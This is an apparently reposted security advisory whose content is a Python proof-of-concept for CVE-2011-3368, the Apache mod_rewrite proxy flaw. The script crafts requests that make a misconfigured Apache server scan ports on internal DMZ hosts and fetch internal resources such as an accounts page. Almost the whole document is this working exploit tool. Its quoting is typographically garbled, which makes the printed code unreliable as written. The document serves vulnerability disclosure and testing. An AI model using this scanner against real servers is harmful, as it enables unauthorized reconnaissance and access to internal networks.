‘Apache mod_rewrite Vulnerability PoC’

Summary

Credit:

‘The information has been provided by Rodrigo Marcos.
The original article can be found at: http://www.secforce.co.uk/research/tools.html


Details

‘Here is a PoC for the latest Apache mod_rewrite vulnerability.

You can find some more information about the tool here:
http://www.secforce.co.uk/blog/2011/10/cve-2011-3368-poc-apache-proxy-scanner/

#!/usr/bin/env python

import socket
import string
import getopt, sys

known_ports = [0,21,22,23,25,53,69,80,110,137,139,443,445,3306,3389,5432,5900,8080]

def send_request(url, apache_target, apache_port, internal_target, internal_port, resource):

 get = ‘GET ‘ + url + ‘@’ + internal_target + ‘:’ + internal_port + ‘/’ + resource + ‘ HTTP/1.1rn’
 get = get + ‘Host: ‘ + apache_target + ‘rnrn’
 
 remoteserver = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 remoteserver.settimeout(3)

 try:
  remoteserver.connect((apache_target, int(apache_port)))
  remoteserver.send(get)
  return remoteserver.recv(4096)
 except:
  return ”

def get_banner(result):
 return result[string.find(result, ‘rnrn’)+4:]

def scan_host(url, apache_target, apache_port, internal_target, tested_ports, resource):

 print_banner(url, apache_target, apache_port, internal_target, tested_ports, resource)
 for port in tested_ports:
  port = str(port)
  result = send_request(url, apache_target, apache_port, internal_target, port, resource)
  if string.find(result,’HTTP/1.1 200′)!=-1 or
  string.find(result,’HTTP/1.1 30′)!=-1 or
  string.find(result,’HTTP/1.1 502′)!=-1:
   print ‘- Open port: ‘ + port + ‘/TCP’
   print get_banner(result)
  elif len(result)==0:
    print ‘- Filtered port: ‘ + port + ‘/TCP’
  else:
    print ‘- Closed port: ‘ + port + ‘/TCP’
   

def usage():
 print
 print ‘CVE-2011-3368 proof of concept by Rodrigo Marcos’
 print ‘http://www.secforce.co.uk’
 print
 print ‘usage():’
 print ‘python apache_scan.py [options]’
 print
 print ‘ [options]’
 print ‘ -r: Remote Apache host’
 print ‘ -p: Remote Apache port (default is 80)’
 print ‘ -u: URL on the remote web server (default is /)’
 print ‘ -d: Host in the DMZ (default is 127.0.0.1)’
 print ‘ -e: Port in the DMZ (enables ‘single port scan’)’
 print ‘ -g: GET request to the host in the DMZ (default is /)’
 print ‘ -h: Help page’
 print
 print ‘examples:’
 print ‘ – Port scan of the remote host’
 print ‘ python apache_scan.py -r www.example.com -u /images/test.gif’
 print ‘ – Port scan of a host in the DMZ’
 print ‘ python apache_scan.py -r www.example.com -u /images/test.gif -d internalhost.local’
 print ‘ – Retrieve a resource from a host in the DMZ’
 print ‘ python apache_scan.py -r www.example.com -u /images/test.gif -d internalhost.local -e 80 -g /accounts/index.html’
 print

def print_banner(url, apache_target, apache_port, internal_target, tested_ports, resource):
 print
 print ‘CVE-2011-3368 proof of concept by Rodrigo Marcos’
 print ‘http://www.secforce.co.uk’
 print
 print ‘ [+] Target: ‘ + apache_target
 print ‘ [+] Target port: ‘ + apache_port
 print ‘ [+] Internal host: ‘ + internal_target
 print ‘ [+] Tested ports: ‘ + str(tested_ports)
 print ‘ [+] Internal resource: ‘ + resource
 print

def main():

 global apache_target
 global apache_port
 global url
 global internal_target
 global internal_port
 global resource

 try:
  opts, args = getopt.getopt(sys.argv[1:], ‘u:r:p:d:e:g:h’, [‘help’])
 except getopt.GetoptError:
  usage()
  sys.exit(2)

 try:
  for o, a in opts:
   if o in (‘-h’, ‘–help’):
    usage()
    sys.exit(2)
   if o == ‘-u’:
    url=a
   if o == ‘-r’:
    apache_target=a
   if o == ‘-p’:
    apache_port=a
   if o == ‘-d’:
    internal_target = a
   if o == ‘-e’:
    internal_port=a
   if o == ‘-g’:
    resource=a
  
 except getopt.GetoptError:
  usage()
  sys.exit(2)
  
 if apache_target == ”:
  usage()
  sys.exit(2)

url = ‘/’
apache_target = ”
apache_port = ’80’
internal_target = ‘127.0.0.1’
internal_port = ”
resource = ‘/’

main()

if internal_port!=”:
 tested_ports = [internal_port]
else:
 tested_ports = known_ports

scan_host(url, apache_target, apache_port, internal_target, tested_ports, resource)

CVE Information:
CVE-2011-3368

Categories: Tools